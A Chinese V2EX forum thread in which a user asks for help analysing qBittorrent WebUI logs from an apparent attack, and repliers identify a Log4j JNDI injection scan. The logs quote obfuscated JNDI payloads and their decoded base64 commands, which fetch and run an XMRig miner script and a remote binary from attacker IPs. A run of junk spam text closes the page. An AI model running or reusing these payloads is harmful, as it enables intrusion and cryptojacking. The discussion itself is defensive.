qbittorrent webUI 被入侵了。可否分析一下这段日志 - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
20160409
V2EX    分享发现

qbittorrent webUI 被入侵了。可否分析一下这段日志

  •  
  •   20160409 2023-05-09 16:08:01 +08:00 4669 次点击
    这是一个创建于 887 天前的主题,其中的信息可能已经有所发展或是发生改变。

    在当前最新的 Windows qbittorrent 4.5.2 版本和 4.4.5 版本都遇到了来着这个 IP 的入侵。

    对这些不太懂,唯一能做的是给日志里这段 base64 解了个码;日志末尾的 IP port 指代我的公网 IP 和 webUI 接口。

    我的电脑是已成了矿机了吗,求分析,谢谢。

    第一段 base64:curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 486xqw7y

    2023-04-26 14:36 - WebUI: 请求 Header 中 Referer 与 XFH/Host 不匹配!来源 IP: '95.214.55.244'。Referer: 't('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')'。XFH/Host: 'IP:Port'


    第二段 base64:wget http://107.172.206.114/.duck/lscpu ; curl -O http://107.172.206.114/.duck/lscpu ; chmod +x lscpu ; chmod 777 lscpu ; ./lscpu runner ; sudo ./lscpu runner ; rm -rf lscpu

    2023-05-06 20:13 - WebUI: 请求 Header 中 Referer 与 XFH/Host 不匹配!来源 IP: '95.214.55.244'。Referer: 't('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY3VybCAtTyBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY2htb2QgK3ggbHNjcHUgOyBjaG1vZCA3NzcgbHNjcHUgOyAuL2xzY3B1IHJ1bm5lciA7IHN1ZG8gLi9sc2NwdSBydW5uZXIgOyBybSAtcmYgbHNjcHU=}')'。XFH/Host: 'IP:Port'

    12 条回复    2023-05-09 19:35:05 +08:00
    leoleoleo
        1
    leoleoleo  
       2023-05-09 16:22:20 +08:00   1
    看日志,是尝试利用 Log4j 漏洞来给设备中上挖矿木马。是否利用成功,你需要看一下设备的资源占用,cpu 和内存是否有异常的标高,以及系统是否出现了异常的定时任务或者服务。
    0TSH60F7J2rVkg8t
        2
    0TSH60F7J2rVkg8t  
       2023-05-09 16:27:00 +08:00   1
    理论上这是个利用 linux 漏洞攻击的代码,如果楼主是 windows 的话,应该不会中找。
    Lentin
        3
    Lentin  
       2023-05-09 16:28:47 +08:00   1
    javashell
        4
    javashell  
       2023-05-09 16:49:40 +08:00   1
    从日志上看是 log4j 库进行 jndi 注入攻击。
    如果楼主的 qbittorrent webUI 使用的默认密码或使用的是弱密码,可以进行命令执行的(有次 ssh 配置改崩了,就是通过 qbittorrent 改回来的)
    20160409
        5
    20160409  
    OP
       2023-05-09 16:59:04 +08:00
    谢谢各位。

    @leoleoleo #1 我检查看看。一般这种是用可执行程序还是脚本之类的来挖矿?


    @javashell 就是非常常见的弱密码,我现在干脆把 webui 关了。几天前查到 qbit 大概是 4.5.1 版本时还爆出了一个漏洞,能直接绕过验证。
    javashell
        6
    javashell  
       2023-05-09 17:07:28 +08:00   1
    @20160409 qbittorrent 有个功能可以实现下载完成后执行指定的命令 ,叫 "Run external program on torrent completion" 可被用来进行挖矿、勒索等 ,最好是关闭 webui 访问
    20160409
        7
    20160409  
    OP
       2023-05-09 17:51:09 +08:00
    形势应该还不严峻

    > QBittorrent is C++, safe

    https://www.reddit.com/r/homelab/comments/recvfp/comment/ho78vfd/

    -------------------

    拿火绒的 Log4j2 漏洞缓解工具扫描,返回结果:

    > [Error] Get JAVA_HOME path failed ..

    JAVA_HOME 都没配置好,应该利用不起来这个漏洞?

    [3> 如果出现如下日志,则需要排查 JAVA_HOME 环境变量是否正确配置
    ----- CVE-2021-44228 漏洞缓解结果 -----
    [Error] Get JAVA_HOME path failed ..
    或者
    ----- CVE-2021-44228 漏洞缓解结果 -----
    [Error] Get Java version failed ..]

    https://bbs.huorong.cn/thread-96320-1-1.html
    7h3d4wn
        8
    7h3d4wn  
       2023-05-09 18:56:42 +08:00   1
    tpxcer
        9
    tpxcer  
       2023-05-09 19:04:12 +08:00 via iPhone
    怎么发现被入侵的?我现 24 小时开着,外网也直接能访问到,有点慌
    20160409
        10
    20160409  
    OP
       2023-05-09 19:14:21 +08:00
    @7h3d4wn #8 就是这个


    @tpxcer #9 软件执行日志里
    winsunz
        11
    winsunz  
       2023-05-09 19:30:28 +08:00
    吓得我赶紧关掉端口了
    webshe11
        12
    webshe11  
       2023-05-09 19:35:05 +08:00   1
    批量扫 Log4j CVE-2021-44228 漏洞的,qBT 的 Web 服务不是用 Java 写的,不受这个漏洞影响
    但是做好访问控制,减少攻击面总没错
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     3463 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 31ms UTC 04:41 PVG 12:41 LAX 21:41 JFK 00:41
    Do have faith in what you're doing.
    ubao snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86